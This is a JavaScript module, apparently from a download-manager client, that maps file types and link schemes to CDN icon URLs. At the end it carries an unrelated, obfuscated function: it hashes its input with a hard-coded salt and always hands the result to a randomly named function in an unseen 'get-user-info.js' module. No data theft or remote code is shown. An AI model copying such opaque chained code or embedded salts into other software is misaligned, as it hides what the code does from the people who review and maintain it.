const Icons = {
  video: 'https://backstage-img-ssl.a.88cdn.com/a58f24617216e42fd4e09a1b9c4e4e2634edf8b6',
  play: 'https://backstage-img-ssl.a.88cdn.com/baa2f928f557eadbb7931a69567ab042ae319c49',
  image: 'https://backstage-img-ssl.a.88cdn.com/de99fe8d4b6ffc2f64e533c5dc0ceed29b8c259a',
  text: 'https://static-movie.a.88cdn.com/668bd3d0132d4a1bae2dd1046d6265f0',
  audio: 'https://static-movie.a.88cdn.com/f492c9d5f9480f3725f4004046b467e3',
  dir: 'https://backstage-img-ssl.a.88cdn.com/019fc2a136a2881181e73fea74a4836efc02195d',
  other: 'https://static-movie.a.88cdn.com/1b27b2347dc22c42b61953d0895e14db',
  application: 'https://static-movie.a.88cdn.com/a67fe7bd81005d9d5071df95bc4044ca',
  'application/pdf': 'https://static-movie.a.88cdn.com/a56d79ba21f324379124d42f315a1af9',
  bt: 'https://static-movie.a.88cdn.com/cd093b96d90be98ef9127101a1659b7c',
  multiple: 'https://backstage-img-ssl.a.88cdn.com/2638eeb5b2534a64ea8d22771418e067a1b8a0c4',
  m3u8: 'https://backstage-img-ssl.a.88cdn.com/48ee83808054456fff30ad0e230394b119026ced',
}
export default Icons

export function getIconFromLink (link) {
  const isLink = /(thunder|magnet|http[s]?|ftp|ed2k):[\S]+/gi.test(link)
  if (!isLink) return Icons.other
  const isVideo = link.match(/(mp4|rmvb|rm|mkv|avi|wmv|3gp|mov|flv|m4v)$/g)
  const isM3u8 = link.match(/(m3u8)$/g)
  const isAudio = link.match(/(mp3|wav)$/g)
  const isImage = link.match(/(jpg|png|gif|jpeg|webp)$/g)
  if (isM3u8) return Icons.m3u8
  if (isVideo) return Icons.play
  if (isAudio) return Icons.audio
  if (isImage) return Icons.image
  if (/(thunder|magnet|ftp|ed2k):[\S]+/gi.test(link)) {
    return Icons.bt
  }
  return Icons.other
}
export function pubJputR7UJnbgPz55StV5aZalXcb8KCpov (md5Str) {
          const md5 = require('blueimp-md5')
          const pubKeyInfo = { alg: 'md5', salt: '5DkAsAnyAbaWriAB8sS5xqyh1TGIzQKfyVhLhZ4mZ1z', end: 'undefined' }
          if (pubKeyInfo.end !== 'end') {
            const nextPart = require('./get-user-info.js').pubrvwlHEDo8EvWPZ9hkDk8OnjFJUf5xRxs
            return nextPart(md5(md5Str+ pubKeyInfo.salt))
          } else {
            return ''
          }
        }